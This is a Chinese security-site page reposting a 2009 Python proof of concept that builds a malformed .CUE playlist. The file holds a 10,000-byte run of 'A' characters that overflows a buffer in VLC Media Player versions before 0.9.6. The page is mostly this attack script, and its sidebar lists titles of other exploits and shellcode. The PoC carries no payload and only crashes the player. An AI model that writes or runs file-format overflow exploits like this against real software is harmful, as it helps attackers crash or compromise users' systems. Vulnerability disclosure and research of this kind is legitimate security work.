首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VLC Media Player < 0.9.6 (CUE) Local Buffer Overflow PoC
来源:vfocus.net 作者:Dr_IDE 发布时间:2009-09-16  

#!/usr/bin/env python

####################################################################################
#
# VLC Media Player < 0.9.6 (.CUE) Buffer Overflow PoC
# Found By: Dr_IDE
# Tested On: XPSP3
#
####################################################################################

head = ("\x46\x49\x4c\x45\x20\x22")
buff = ("\x41" * 10000)
foot = (
"\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20\x54"
"\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32\x33"
"\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31\x20"
"\x30\x30\x3a\x30\x30\x3a\x30\x30")

f1 = open("vlc_0.8.6.cue","w")
f1.write(head + buff + foot)
f1.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·EasyMail Quicksoft 6.0.2.0 (Cr
·SAP Player 0.9 (.pla) Universa
·EasyMail Quicksoft 6.0.2.0 Act
·MP3 Collector 2.3 (m3u File) L
·Novell Groupwise Client 7.0.3.
·BigAnt Server 2.50 GET Request
·linux/x86 shellcode that forks
·DJ Studio Pro 4.2 (.PLS file)
·linux/x86 shellcode that forks
·Installshield 2009 Premier ver
·HERO SUPER PLAYER 3000 .M3U Fi
·Soritong MP3 Player version 1.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved